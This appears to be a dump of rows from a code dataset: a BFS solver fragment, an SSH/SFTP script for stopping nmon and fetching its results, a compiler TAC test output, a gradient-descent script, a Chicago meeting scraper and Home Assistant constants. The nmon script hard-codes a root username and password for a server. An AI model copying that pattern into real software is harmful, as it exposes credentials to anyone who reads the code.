# Driver: T test cases; each gives grid width N and height M followed by
# M map rows ('*' fire, '@' start, '#' wall, '.' floor).
T = int(sys.stdin.readline())
for _ in range(T):
    N, M = map(int, sys.stdin.readline().split())
    list_map = [sys.stdin.readline().strip() for _ in range(M)]
    # visit codes: 0 unvisited, 1 player, 2 fire, 3 wall
    list_visit = [[0]*N for _ in range(M)]
    print(bfs())
| UTF-8 | Python | false | false | 2,723 | py | 296 | Q_5427.py | 291 | 0.49276 | 0.473892 | 0 | 68 | 32.514706 | 88 |
donginhb/AutoDemo | 9,311,489,136,880 | 5d7bb98bcb97de73c27bba1a22b1a19fe3c0ac20 | 2a6e8695810a82c6d1cad663168ef44667f07bb0 | /libs/jenkins_builder/Stop_Nmon_On_Centos.py | caf2de70b435daaba8b8023faa9b56c09d833e91 | []
| no_license | https://github.com/donginhb/AutoDemo | 6f9b81c8e8759beffeb0f872bffc2593a4298967 | 0df59118b44bc350dcdd775adc8e1bffc2331d84 | refs/heads/master | 2020-03-21T12:30:00.084903 | 2018-03-28T04:33:32 | 2018-03-28T04:33:32 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/python
#-*- coding:UTF-8 -*-
"""
#===============================================================================
# Stop Nmon monitoring,when jmeter finished
# Upload nmon result *.nmon fils to xtcAuto project folder TempReportmonReport
#===============================================================================
"""
import traceback
import paramiko
import time
import os
class SSHClient(object):
    """Thin paramiko wrapper: run commands over SSH and fetch nmon result
    files back over SFTP.

    Bug fixes vs. original: ``connect_sftp`` called ``sys.exit(1)`` without
    ``sys`` being imported anywhere in the module (guaranteed NameError on
    the error path), and ``run_upload`` printed its success message when
    the transfer had *failed* (inverted condition).
    """

    def __init__(self, params):
        # `params` is accepted for backward compatibility but unused.
        self.port = 22

    def connection(self, hostname, username, password, timeout=60.0):
        """Open an SSH connection and return the paramiko client.

        On failure the error is printed and the (closed) client is still
        returned, matching the original best-effort behaviour.
        """
        try:
            client = paramiko.SSHClient()
            client.load_system_host_keys()
            client.set_missing_host_key_policy(paramiko.WarningPolicy())
            client.connect(hostname, self.port, username, password, timeout=60.0)
        except Exception as e:
            print('*** Caught exception: %s: %s' % (e.__class__, e))
            traceback.print_exc()
            client.close()
        return client

    def write_commands(self, client, cmds, timeout=15.0):
        """Execute *cmds* remotely; return stdout, or the exception instance
        on failure (legacy contract kept for existing callers)."""
        try:
            stdin, stdout, stderr = client.exec_command(cmds, timeout)
        except Exception as e:
            client.close()
            return e
        return stdout

    def stop_nmon(self, hostname, username, password):
        """Send SIGUSR2 to the first nmon process so it flushes and exits."""
        client = self.connection(hostname, username, password)
        GetNmonPidCmds = "ps aux | grep nmon |awk 'NR == 1' |awk '{print $2}'"
        stdout = self.write_commands(client, GetNmonPidCmds)
        stdout = stdout.readlines()
        stdout = self.write_commands(client, "kill -USR2 %d" % (int(stdout[0])))

    def upload_file_ncftpput(self, SSHClient, ftpServer, ftpUser, ftpPasswd, logServerPath, LocalFilepath):
        """Push *.nmon files to an FTP server by running ncftpput remotely."""
        ncftpputCmds = "/usr/bin/ncftpput -u %s -p %s %s %s %s/*.nmon" % (ftpUser, ftpPasswd, ftpServer, logServerPath, LocalFilepath)
        try:
            stdout = self.write_commands(SSHClient, ncftpputCmds)
        except Exception as e:
            print('*** ftp_connection: %s: %s' % (e.__class__, e))
            return None

    def connect_sftp(self, hostname, username, password):
        """Return an SFTPClient; exits the process (status 1) on failure."""
        import sys  # local import: `sys` is not imported at module level
        try:
            t = paramiko.Transport((hostname, self.port))
            t.connect(username=username, password=password)
            return paramiko.SFTPClient.from_transport(t)
        except Exception as e:
            print('*** Connect_sftp Caught exception: %s: %s' % (e.__class__, e))
            traceback.print_exc()
            try:
                # `t` may be unbound if Transport() itself failed.
                t.close()
            except Exception:
                pass
            sys.exit(1)

    def listdir_sftp(self, sftp_client, dir_root):
        """List the entries of *dir_root* on the remote host."""
        return sftp_client.listdir(dir_root)

    def getfile_sftp(self, sftp_client, remotepath, localpath=None):
        """Download a single remote file to *localpath*."""
        sftp_client.get(remotepath, localpath)

    def upload_nmonResult_sftp(self, hostname, username, password, remotepath, localpath):
        """Fetch every *.nmon file under *remotepath* into *localpath*.

        Returns True on success, False when any step fails.
        """
        try:
            sftp_client = self.connect_sftp(hostname, username, password)
            for files in self.listdir_sftp(sftp_client, remotepath):
                if "nmon" in os.path.splitext(files)[1]:
                    self.getfile_sftp(sftp_client, remotepath + "/" + files, os.path.join(localpath, files))
            return True
        except Exception as e:
            print('*** upload_nmonResult_sftp Caught exception: %s: %s' % (e.__class__, e))
            return False

    def run_upload(self, hostname, username, password, RemoteServerPath, LocalFilepath, timeout=15.0):
        """Transfer nmon results and report the outcome.

        Bug fix: the success message is now printed when the transfer
        succeeded (the original tested `if not ...`).
        """
        SSHClient = self.connection(hostname, username, password)
        if self.upload_nmonResult_sftp(hostname, username, password, RemoteServerPath, LocalFilepath):
            print("Stop nmon and Upload nmon result Successfully !")
        SSHClient.close()
if __name__ == "__main__":
    #Passing jenkins environment variables,depend on different OS
    #===========================================================================
    # hostname = os.environ['ServerHost']
    # username=os.environ['ServerRoot']
    # password=os.environ['ServerPasswd']
    #===========================================================================
    # NOTE(review): hard-coded host/credentials below; should come from the
    # environment variables above (or a secrets store) instead.
    hostname = "172.19.6.176"
    username="root"
    password="suneee"
    #===========================================================================
    # ftpServer = os.environ['FtpServerHost']
    # ftpUser = os.environ['FtpUserName']
    # ftpPasswd = os.environ['FtpUserPasswd']
    #===========================================================================
    # Currently still uses a local path on the executor machine.
    RemoteServerPath = '/root'
    #LocalFilepath = os.environ['TestReportDir'] + "/TempReport/NmonReport"
    LocalFilepath = r"C:\2_EclipseWorkspace\xtcAuto\output" + "\\TempReport\\NmonReport"
    sshc = SSHClient(object)
    # Stop nmon remotely, give it time to flush, then pull the result files.
    sshc.stop_nmon(hostname, username,password)
    time.sleep(5.0)
    sshc.run_upload(hostname,username,password,RemoteServerPath,LocalFilepath,timeout=15.0)
| UTF-8 | Python | false | false | 4,997 | py | 93 | Stop_Nmon_On_Centos.py | 37 | 0.555019 | 0.547777 | 0.000201 | 120 | 40.391667 | 133 |
WN1695173791/undergraduate | 11,149,735,136,605 | cc4b165fd1638fc69b2568313d5d329269bfce6f | 50bf62fd5cf747db848c01283e535c8ec59a1f9e | /compiler/decaf_PA3_submit/TestCases/S3/output/q3-super-test4.tac | 1786856e88875dd04cc5a3421cfeb2e4297369fe | []
| no_license | https://github.com/WN1695173791/undergraduate | 19985941ea6ea5fc1cd89c232b228a3a111d0eea | 1261ddd74facbfa7128b05345f6efab7bcb252a0 | refs/heads/master | 2023-03-19T09:41:06.259173 | 2018-06-24T07:57:28 | 2018-06-24T07:57:28 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | VTABLE(_A) {
<empty>
A
_A.setA;
_A.print;
_A.allprint;
_A.fun;
}
VTABLE(_B) {
_A
B
_A.setA;
_B.print;
_B.allprint;
_B.fun;
_B.setB;
}
VTABLE(_C) {
_A
C
_A.setA;
_C.print;
_C.allprint;
_C.fun;
_C.setC;
}
VTABLE(_D) {
_B
D
_A.setA;
_D.print;
_D.allprint;
_D.fun;
_B.setB;
_D.setD;
}
VTABLE(_E) {
_C
E
_A.setA;
_E.print;
_C.allprint;
_E.fun;
_C.setC;
_E.setE;
}
VTABLE(_F) {
_E
F
_A.setA;
_F.print;
_F.allprint;
_F.fun;
_C.setC;
_E.setE;
_F.setF;
}
VTABLE(_G) {
_C
G
_A.setA;
_G.print;
_G.allprint;
_G.fun;
_C.setC;
_G.setG;
}
VTABLE(_Main) {
<empty>
Main
}
FUNCTION(_A_New) {
memo ''
_A_New:
_T40 = 12
parm _T40
_T41 = call _Alloc
_T42 = 0
*(_T41 + 4) = _T42
*(_T41 + 8) = _T42
_T43 = VTBL <_A>
*(_T41 + 0) = _T43
return _T41
}
FUNCTION(_B_New) {
memo ''
_B_New:
_T44 = 20
parm _T44
_T45 = call _Alloc
_T46 = 0
*(_T45 + 4) = _T46
*(_T45 + 8) = _T46
*(_T45 + 12) = _T46
*(_T45 + 16) = _T46
_T47 = VTBL <_B>
*(_T45 + 0) = _T47
return _T45
}
FUNCTION(_C_New) {
memo ''
_C_New:
_T48 = 20
parm _T48
_T49 = call _Alloc
_T50 = 0
*(_T49 + 4) = _T50
*(_T49 + 8) = _T50
*(_T49 + 12) = _T50
*(_T49 + 16) = _T50
_T51 = VTBL <_C>
*(_T49 + 0) = _T51
return _T49
}
FUNCTION(_D_New) {
memo ''
_D_New:
_T52 = 28
parm _T52
_T53 = call _Alloc
_T54 = 0
_T55 = 4
_T56 = (_T53 + _T52)
_L40:
_T57 = (_T56 - _T55)
_T56 = _T57
_T58 = (_T52 - _T55)
_T52 = _T58
if (_T52 == 0) branch _L41
*(_T56 + 0) = _T54
branch _L40
_L41:
_T59 = VTBL <_D>
*(_T56 + 0) = _T59
return _T56
}
FUNCTION(_E_New) {
memo ''
_E_New:
_T60 = 28
parm _T60
_T61 = call _Alloc
_T62 = 0
_T63 = 4
_T64 = (_T61 + _T60)
_L43:
_T65 = (_T64 - _T63)
_T64 = _T65
_T66 = (_T60 - _T63)
_T60 = _T66
if (_T60 == 0) branch _L44
*(_T64 + 0) = _T62
branch _L43
_L44:
_T67 = VTBL <_E>
*(_T64 + 0) = _T67
return _T64
}
FUNCTION(_F_New) {
memo ''
_F_New:
_T68 = 36
parm _T68
_T69 = call _Alloc
_T70 = 0
_T71 = 4
_T72 = (_T69 + _T68)
_L46:
_T73 = (_T72 - _T71)
_T72 = _T73
_T74 = (_T68 - _T71)
_T68 = _T74
if (_T68 == 0) branch _L47
*(_T72 + 0) = _T70
branch _L46
_L47:
_T75 = VTBL <_F>
*(_T72 + 0) = _T75
return _T72
}
FUNCTION(_G_New) {
memo ''
_G_New:
_T76 = 24
parm _T76
_T77 = call _Alloc
_T78 = 0
_T79 = 4
_T80 = (_T77 + _T76)
_L49:
_T81 = (_T80 - _T79)
_T80 = _T81
_T82 = (_T76 - _T79)
_T76 = _T82
if (_T76 == 0) branch _L50
*(_T80 + 0) = _T78
branch _L49
_L50:
_T83 = VTBL <_G>
*(_T80 + 0) = _T83
return _T80
}
FUNCTION(_Main_New) {
memo ''
_Main_New:
_T84 = 4
parm _T84
_T85 = call _Alloc
_T86 = VTBL <_Main>
*(_T85 + 0) = _T86
return _T85
}
FUNCTION(_A.setA) {
memo '_T0:4 _T1:8 _T2:12'
_A.setA:
_T87 = *(_T0 + 4)
*(_T0 + 4) = _T1
_T88 = *(_T0 + 8)
*(_T0 + 8) = _T2
}
FUNCTION(_A.print) {
memo '_T3:4'
_A.print:
_T89 = " a="
parm _T89
call _PrintString
_T90 = *(_T3 + 4)
parm _T90
call _PrintInt
_T91 = " a1="
parm _T91
call _PrintString
_T92 = *(_T3 + 8)
parm _T92
call _PrintInt
_T93 = " "
parm _T93
call _PrintString
}
FUNCTION(_A.allprint) {
memo '_T4:4'
_A.allprint:
parm _T4
_T94 = *(_T4 + 0)
_T95 = VTBL <_A>
_T96 = *(_T95 + 12)
call _T96
}
FUNCTION(_A.fun) {
memo '_T5:4'
_A.fun:
_T97 = "A"
parm _T97
call _PrintString
parm _T5
_T98 = *(_T5 + 0)
_T99 = VTBL <_A>
_T100 = *(_T99 + 12)
call _T100
_T101 = "\n"
parm _T101
call _PrintString
}
FUNCTION(_B.setB) {
memo '_T6:4 _T7:8 _T8:12'
_B.setB:
_T102 = *(_T6 + 12)
*(_T6 + 12) = _T7
_T103 = *(_T6 + 16)
*(_T6 + 16) = _T8
}
FUNCTION(_B.print) {
memo '_T9:4'
_B.print:
_T104 = " b="
parm _T104
call _PrintString
_T105 = *(_T9 + 12)
parm _T105
call _PrintInt
_T106 = " b1="
parm _T106
call _PrintString
_T107 = *(_T9 + 16)
parm _T107
call _PrintInt
_T108 = " "
parm _T108
call _PrintString
}
FUNCTION(_B.allprint) {
memo '_T10:4'
_B.allprint:
parm _T10
_T109 = *(_T10 + 0)
_T110 = VTBL <_A>
_T111 = *(_T110 + 16)
call _T111
parm _T10
_T112 = *(_T10 + 0)
_T113 = VTBL <_B>
_T114 = *(_T113 + 12)
call _T114
}
FUNCTION(_B.fun) {
memo '_T11:4'
_B.fun:
_T115 = "B"
parm _T115
call _PrintString
parm _T11
_T116 = *(_T11 + 0)
_T117 = VTBL <_A>
_T118 = *(_T117 + 16)
call _T118
parm _T11
_T119 = *(_T11 + 0)
_T120 = VTBL <_B>
_T121 = *(_T120 + 12)
call _T121
_T122 = "\n"
parm _T122
call _PrintString
}
FUNCTION(_C.setC) {
memo '_T12:4 _T13:8 _T14:12'
_C.setC:
_T123 = *(_T12 + 12)
*(_T12 + 12) = _T13
_T124 = *(_T12 + 16)
*(_T12 + 16) = _T14
}
FUNCTION(_C.print) {
memo '_T15:4'
_C.print:
_T125 = " c="
parm _T125
call _PrintString
_T126 = *(_T15 + 12)
parm _T126
call _PrintInt
_T127 = " c1="
parm _T127
call _PrintString
_T128 = *(_T15 + 16)
parm _T128
call _PrintInt
_T129 = " "
parm _T129
call _PrintString
}
FUNCTION(_C.allprint) {
memo '_T16:4'
_C.allprint:
parm _T16
_T130 = *(_T16 + 0)
_T131 = VTBL <_C>
_T132 = *(_T131 + 12)
call _T132
}
FUNCTION(_C.fun) {
memo '_T17:4'
_C.fun:
_T133 = "C"
parm _T133
call _PrintString
parm _T17
_T134 = *(_T17 + 0)
_T135 = VTBL <_A>
_T136 = *(_T135 + 16)
call _T136
parm _T17
_T137 = *(_T17 + 0)
_T138 = VTBL <_C>
_T139 = *(_T138 + 12)
call _T139
_T140 = "\n"
parm _T140
call _PrintString
}
FUNCTION(_D.setD) {
memo '_T18:4 _T19:8 _T20:12'
_D.setD:
_T141 = *(_T18 + 20)
*(_T18 + 20) = _T19
_T142 = *(_T18 + 24)
*(_T18 + 24) = _T20
}
FUNCTION(_D.print) {
memo '_T21:4'
_D.print:
_T143 = " d="
parm _T143
call _PrintString
_T144 = *(_T21 + 20)
parm _T144
call _PrintInt
_T145 = " d1="
parm _T145
call _PrintString
_T146 = *(_T21 + 24)
parm _T146
call _PrintInt
_T147 = " "
parm _T147
call _PrintString
}
FUNCTION(_D.allprint) {
memo '_T22:4'
_D.allprint:
parm _T22
_T148 = *(_T22 + 0)
_T149 = VTBL <_B>
_T150 = *(_T149 + 16)
call _T150
parm _T22
_T151 = *(_T22 + 0)
_T152 = VTBL <_D>
_T153 = *(_T152 + 12)
call _T153
}
FUNCTION(_D.fun) {
memo '_T23:4'
_D.fun:
_T154 = "D"
parm _T154
call _PrintString
parm _T23
_T155 = *(_T23 + 0)
_T156 = VTBL <_B>
_T157 = *(_T156 + 16)
call _T157
parm _T23
_T158 = *(_T23 + 0)
_T159 = VTBL <_D>
_T160 = *(_T159 + 12)
call _T160
_T161 = "\n"
parm _T161
call _PrintString
}
FUNCTION(_E.setE) {
memo '_T24:4 _T25:8 _T26:12'
_E.setE:
_T162 = *(_T24 + 20)
*(_T24 + 20) = _T25
_T163 = *(_T24 + 24)
*(_T24 + 24) = _T26
}
FUNCTION(_E.print) {
memo '_T27:4'
_E.print:
_T164 = " e="
parm _T164
call _PrintString
_T165 = *(_T27 + 20)
parm _T165
call _PrintInt
_T166 = " e1="
parm _T166
call _PrintString
_T167 = *(_T27 + 24)
parm _T167
call _PrintInt
_T168 = " "
parm _T168
call _PrintString
}
FUNCTION(_E.fun) {
memo '_T28:4'
_E.fun:
_T169 = "E"
parm _T169
call _PrintString
parm _T28
_T170 = *(_T28 + 0)
_T171 = VTBL <_E>
_T172 = *(_T171 + 16)
call _T172
parm _T28
_T173 = *(_T28 + 0)
_T174 = VTBL <_E>
_T175 = *(_T174 + 12)
call _T175
_T176 = "\n"
parm _T176
call _PrintString
}
FUNCTION(_F.setF) {
memo '_T29:4 _T30:8 _T31:12'
_F.setF:
_T177 = *(_T29 + 28)
*(_T29 + 28) = _T30
_T178 = *(_T29 + 32)
*(_T29 + 32) = _T31
}
FUNCTION(_F.print) {
memo '_T32:4'
_F.print:
_T179 = " f="
parm _T179
call _PrintString
_T180 = *(_T32 + 28)
parm _T180
call _PrintInt
_T181 = " f1="
parm _T181
call _PrintString
_T182 = *(_T32 + 32)
parm _T182
call _PrintInt
_T183 = " "
parm _T183
call _PrintString
}
FUNCTION(_F.allprint) {
memo '_T33:4'
_F.allprint:
parm _T33
_T184 = *(_T33 + 0)
_T185 = VTBL <_E>
_T186 = *(_T185 + 16)
call _T186
parm _T33
_T187 = *(_T33 + 0)
_T188 = VTBL <_F>
_T189 = *(_T188 + 12)
call _T189
}
FUNCTION(_F.fun) {
memo '_T34:4'
_F.fun:
_T190 = "F"
parm _T190
call _PrintString
parm _T34
_T191 = *(_T34 + 0)
_T192 = VTBL <_E>
_T193 = *(_T192 + 16)
call _T193
parm _T34
_T194 = *(_T34 + 0)
_T195 = VTBL <_F>
_T196 = *(_T195 + 12)
call _T196
_T197 = "\n"
parm _T197
call _PrintString
}
FUNCTION(_G.setG) {
memo '_T35:4 _T36:8'
_G.setG:
_T198 = *(_T35 + 20)
*(_T35 + 20) = _T36
}
FUNCTION(_G.print) {
memo '_T37:4'
_G.print:
_T199 = " g="
parm _T199
call _PrintString
_T200 = *(_T37 + 20)
parm _T200
call _PrintInt
}
FUNCTION(_G.allprint) {
memo '_T38:4'
_G.allprint:
parm _T38
_T201 = *(_T38 + 0)
_T202 = VTBL <_C>
_T203 = *(_T202 + 16)
call _T203
parm _T38
_T204 = *(_T38 + 0)
_T205 = VTBL <_G>
_T206 = *(_T205 + 12)
call _T206
}
FUNCTION(_G.fun) {
memo '_T39:4'
_G.fun:
_T207 = "G"
parm _T207
call _PrintString
parm _T39
_T208 = *(_T39 + 0)
_T209 = VTBL <_C>
_T210 = *(_T209 + 16)
call _T210
parm _T39
_T211 = *(_T39 + 0)
_T212 = VTBL <_G>
_T213 = *(_T212 + 12)
call _T213
_T214 = "\n"
parm _T214
call _PrintString
}
FUNCTION(main) {
memo ''
main:
_T222 = call _A_New
_T215 = _T222
_T223 = call _B_New
_T216 = _T223
_T224 = call _C_New
_T217 = _T224
_T225 = call _D_New
_T218 = _T225
_T226 = call _E_New
_T219 = _T226
_T227 = call _F_New
_T220 = _T227
_T228 = call _G_New
_T221 = _T228
_T229 = 10
_T230 = 11
parm _T215
parm _T229
parm _T230
_T231 = *(_T215 + 0)
_T232 = *(_T231 + 8)
call _T232
_T233 = 20
_T234 = 21
parm _T216
parm _T233
parm _T234
_T235 = *(_T216 + 0)
_T236 = *(_T235 + 8)
call _T236
_T237 = 22
_T238 = 23
parm _T216
parm _T237
parm _T238
_T239 = *(_T216 + 0)
_T240 = *(_T239 + 24)
call _T240
_T241 = 30
_T242 = 31
parm _T217
parm _T241
parm _T242
_T243 = *(_T217 + 0)
_T244 = *(_T243 + 8)
call _T244
_T245 = 32
_T246 = 33
parm _T217
parm _T245
parm _T246
_T247 = *(_T217 + 0)
_T248 = *(_T247 + 24)
call _T248
_T249 = 40
_T250 = 41
parm _T218
parm _T249
parm _T250
_T251 = *(_T218 + 0)
_T252 = *(_T251 + 8)
call _T252
_T253 = 42
_T254 = 43
parm _T218
parm _T253
parm _T254
_T255 = *(_T218 + 0)
_T256 = *(_T255 + 24)
call _T256
_T257 = 44
_T258 = 45
parm _T218
parm _T257
parm _T258
_T259 = *(_T218 + 0)
_T260 = *(_T259 + 28)
call _T260
_T261 = 50
_T262 = 51
parm _T219
parm _T261
parm _T262
_T263 = *(_T219 + 0)
_T264 = *(_T263 + 8)
call _T264
_T265 = 52
_T266 = 53
parm _T219
parm _T265
parm _T266
_T267 = *(_T219 + 0)
_T268 = *(_T267 + 24)
call _T268
_T269 = 54
_T270 = 55
parm _T219
parm _T269
parm _T270
_T271 = *(_T219 + 0)
_T272 = *(_T271 + 28)
call _T272
_T273 = 60
_T274 = 61
parm _T220
parm _T273
parm _T274
_T275 = *(_T220 + 0)
_T276 = *(_T275 + 8)
call _T276
_T277 = 62
_T278 = 63
parm _T220
parm _T277
parm _T278
_T279 = *(_T220 + 0)
_T280 = *(_T279 + 24)
call _T280
_T281 = 64
_T282 = 65
parm _T220
parm _T281
parm _T282
_T283 = *(_T220 + 0)
_T284 = *(_T283 + 28)
call _T284
_T285 = 66
_T286 = 67
parm _T220
parm _T285
parm _T286
_T287 = *(_T220 + 0)
_T288 = *(_T287 + 32)
call _T288
_T289 = 70
_T290 = 71
parm _T221
parm _T289
parm _T290
_T291 = *(_T221 + 0)
_T292 = *(_T291 + 8)
call _T292
_T293 = 72
_T294 = 73
parm _T221
parm _T293
parm _T294
_T295 = *(_T221 + 0)
_T296 = *(_T295 + 24)
call _T296
_T297 = 74
parm _T221
parm _T297
_T298 = *(_T221 + 0)
_T299 = *(_T298 + 28)
call _T299
parm _T215
_T300 = *(_T215 + 0)
_T301 = *(_T300 + 20)
call _T301
parm _T216
_T302 = *(_T216 + 0)
_T303 = *(_T302 + 20)
call _T303
parm _T217
_T304 = *(_T217 + 0)
_T305 = *(_T304 + 20)
call _T305
parm _T218
_T306 = *(_T218 + 0)
_T307 = *(_T306 + 20)
call _T307
parm _T219
_T308 = *(_T219 + 0)
_T309 = *(_T308 + 20)
call _T309
parm _T220
_T310 = *(_T220 + 0)
_T311 = *(_T310 + 20)
call _T311
parm _T221
_T312 = *(_T221 + 0)
_T313 = *(_T312 + 20)
call _T313
}
| UTF-8 | Python | false | false | 13,371 | tac | 339 | q3-super-test4.tac | 123 | 0.451649 | 0.277541 | 0 | 830 | 15.108434 | 30 |
bmoretz/Python-Playground | 18,915,035,986,167 | 3f73820e70f0e98a92f5759939d4e9d4cb51d451 | c947a71a16ed180c920d4b362347f980d93bd2fe | /src/DoingMathInPython/ch_07/challenge/gradient_descent.py | 02f9e62136737f5f7a1777c3969f9305e11c849c | [
"MIT"
]
| permissive | https://github.com/bmoretz/Python-Playground | b69cac015e95d97f46ebd678c4493a44befb556f | a367ec7659b85c24363c21b5c0ac25db08ffa1f6 | refs/heads/master | 2021-05-13T23:35:31.986884 | 2019-11-23T19:07:58 | 2019-11-23T19:07:58 | 116,520,816 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # using GRADIENT DESCENT to find extrema values
'''
Use gradient descent to find the minimum value for a function
'''
import math
from sympy import Derivative, Symbol, sympify
from sympy.core.sympify import SympifyError
from collections import namedtuple
def grad_descent(x0, f1x, v):
    """Plain gradient descent driven by the derivative expression *f1x*.

    Starting from *x0*, repeatedly steps against the gradient until two
    successive iterates differ by less than a fixed tolerance.  Every new
    iterate is printed (matching the original diagnostic output) and the
    final iterate is returned rounded to 7 decimal places.
    """
    epsilon = 1e-6
    step_size = 1e-4
    previous = x0
    current = previous - step_size * f1x.subs({v: previous}).evalf()
    print(current)
    while abs(previous - current) > epsilon:
        previous = current
        current = previous - step_size * f1x.subs({v: previous}).evalf()
        print(current)
    return round(current, 7)
def find_min(f, v, i):
    """Locate a local minimum of *f* in variable *v*, starting from *i*.

    The symbolic first derivative is printed before descent begins
    (preserving the original's diagnostic output).
    """
    derivative = Derivative(f, v).doit()
    print(derivative)
    return grad_descent(i, derivative, v)
if __name__ == '__main__':
    try:
        f = sympify(input('Enter a function in one variable: '))
        v = Symbol(input('Enter the variable: '))
        i = float(input('Enter the initial value: '))
    except SympifyError:
        print('Error parsing the function')
    else:
        # Bug fix: find_min takes three arguments (f, v, initial value);
        # the original call omitted `i` and raised TypeError at runtime.
        x_min = find_min(f, v, i)
        value = round(f.subs({v: x_min}).evalf(), 7)
        # Bug fix: the minimum *value* occurs *at* x_min; the original
        # format arguments were swapped.
        print('The global minimum for function {0} is {1} at {2}'.format(f, value, x_min))
openoakland/councilmatic-scraper | 5,360,119,188,870 | 16938672c3bfdf6e5596dcb7c4277ae10d29ffcb | 581e474926c6d8d44010dbfa32a3ebe156385e04 | /chicago/events.py | 9e282e8eb5d8f14fe7ba619e8fd356786d289e09 | []
| no_license | https://github.com/openoakland/councilmatic-scraper | 9ac52367494e56e9a59fbcc9190ec3ecd77917ba | 996b14ea17c768da3c8ae23079411c918140b320 | refs/heads/dev | 2021-09-16T06:53:00.826308 | 2018-03-28T02:10:19 | 2018-03-28T02:10:19 | 104,142,197 | 9 | 5 | null | false | 2018-03-28T02:10:20 | 2017-09-19T23:55:48 | 2017-12-06T04:33:31 | 2018-03-28T02:10:20 | 1,759 | 2 | 2 | 2 | Python | false | null | from collections import defaultdict
import datetime
import lxml
import lxml.etree
import pytz
import requests
from legistar.events import LegistarAPIEventScraper
from pupa.scrape import Event
class ChicagoEventsScraper(LegistarAPIEventScraper) :
    """Scrape Chicago City Council meetings from the Legistar API into
    pupa Event objects."""
    BASE_URL = 'http://webapi.legistar.com/v1/chicago'
    WEB_URL = "https://chicago.legistar.com/"
    EVENTSPAGE = "https://chicago.legistar.com/Calendar.aspx"
    TIMEZONE = "America/Chicago"
    def scrape(self) :
        for api_event, event in self.events():
            description = None
            when = api_event['start']
            # Legistar packs status notes into the location field, e.g.
            # "<room>--<address>--Chicago, Illinois <status note>".
            location_string = event[u'Meeting Location']
            location_list = location_string.split('--', 2)
            location = ', '.join(location_list[0:2])
            if not location :
                continue
            status_string = location_list[-1].split('Chicago, Illinois')
            if len(status_string) > 1 and status_string[1] :
                status_text = status_string[1].lower()
                # The phrase lists below look accumulated from observed
                # Legistar data -- confirm against live data before pruning.
                if any(phrase in status_text
                       for phrase in ('rescheduled to',
                                      'postponed to',
                                      'reconvened to',
                                      'rescheduled to',
                                      'meeting recessed',
                                      'recessed meeting',
                                      'postponed to',
                                      'recessed until',
                                      'deferred',
                                      'time change',
                                      'date change',
                                      'recessed meeting - reconvene',
                                      'cancelled',
                                      'new date and time',
                                      'rescheduled indefinitely',
                                      'rescheduled for',)) :
                    status = 'cancelled'
                elif status_text in ('rescheduled', 'recessed') :
                    status = 'cancelled'
                elif status_text in ('meeting reconvened',
                                     'reconvened meeting',
                                     'recessed meeting',
                                     'reconvene meeting',
                                     'rescheduled hearing',
                                     'rescheduled meeting',) :
                    status = api_event['status']
                elif status_text in ('amended notice of meeting',
                                     'room change',
                                     'amended notice',
                                     'change of location',
                                     'revised - meeting date and time') :
                    status = api_event['status']
                elif 'room' in status_text :
                    # Looks like a room annotation: prepend it to the location.
                    location = status_string[1] + ', ' + location
                elif status_text in ('wrong meeting date',) :
                    continue
                else :
                    # Unrecognised note: debug print kept (removing it would
                    # change observable behaviour) and note used as description.
                    print(status_text)
                    description = status_string[1].replace('--em--', '').strip()
                    status = api_event['status']
            else :
                status = api_event['status']
            if description :
                e = Event(name=event["Name"]["label"],
                          start_date=when,
                          description=description,
                          location_name=location,
                          status=status)
            else :
                e = Event(name=event["Name"]["label"],
                          start_date=when,
                          location_name=location,
                          status=status)
            e.pupa_id = str(api_event['EventId'])
            # Legistar renders missing videos as "Not<nbsp>available" (\xa0).
            if event['Video'] != 'Not\xa0available' :
                e.add_media_link(note='Recording',
                                 url = event['Video']['url'],
                                 type="recording",
                                 media_type = 'text/html')
            self.addDocs(e, event, 'Agenda')
            self.addDocs(e, event, 'Notice')
            self.addDocs(e, event, 'Transcript')
            self.addDocs(e, event, 'Summary')
            # Normalise a couple of committee names to their canonical form.
            participant = event["Name"]["label"]
            if participant == 'City Council' :
                participant = 'Chicago City Council'
            elif participant == 'Committee on Energy, Environmental Protection and Public Utilities (inactive)' :
                participant = 'Committee on Energy, Environmental Protection and Public Utilities'
            e.add_participant(name=participant,
                              type="organization")
            for item in self.agenda(api_event):
                agenda_item = e.add_agenda_item(item["EventItemTitle"])
                if item["EventItemMatterFile"]:
                    identifier = item["EventItemMatterFile"]
                    agenda_item.add_bill(identifier)
            # Attendees: everyone marked Present in the roll call.
            participants = set()
            for call in self.rollcalls(api_event):
                if call['RollCallValueName'] == 'Present':
                    participants.add(call['RollCallPersonName'])
            for person in participants:
                e.add_participant(name=person,
                                  type="person")
            e.add_source(self.BASE_URL + '/events/{EventId}'.format(**api_event),
                         note='api')
            # 'Meeting Details' may be a plain string (no dict) -> TypeError.
            try:
                detail_url = event['Meeting Details']['url']
            except TypeError:
                e.add_source(self.EVENTSPAGE, note='web')
            else:
                if requests.head(detail_url).status_code == 200:
                    e.add_source(detail_url, note='web')
            yield e
| UTF-8 | Python | false | false | 5,857 | py | 23 | events.py | 18 | 0.445279 | 0.442889 | 0.000171 | 138 | 41.442029 | 113 |
home-assistant/core | 18,915,035,993,837 | 3eb66df365968511a06d7320341637fab50c98f4 | 96dcea595e7c16cec07b3f649afd65f3660a0bad | /homeassistant/components/airthings_ble/const.py | 96372919e70aeb2a37cbff757db168937a9f17a9 | [
"Apache-2.0"
]
| permissive | https://github.com/home-assistant/core | 3455eac2e9d925c92d30178643b1aaccf3a6484f | 80caeafcb5b6e2f9da192d0ea6dd1a5b8244b743 | refs/heads/dev | 2023-08-31T15:41:06.299469 | 2023-08-31T14:50:53 | 2023-08-31T14:50:53 | 12,888,993 | 35,501 | 20,617 | Apache-2.0 | false | 2023-09-14T21:50:15 | 2013-09-17T07:29:48 | 2023-09-14T21:50:03 | 2023-09-14T21:50:15 | 470,852 | 62,888 | 24,675 | 2,641 | Python | false | false | """Constants for Airthings BLE."""
DOMAIN = "airthings_ble"
MFCT_ID = 820
VOLUME_BECQUEREL = "Bq/m³"
VOLUME_PICOCURIE = "pCi/L"
DEFAULT_SCAN_INTERVAL = 300
| UTF-8 | Python | false | false | 160 | py | 11,073 | const.py | 9,921 | 0.698113 | 0.654088 | 0 | 9 | 16.666667 | 34 |
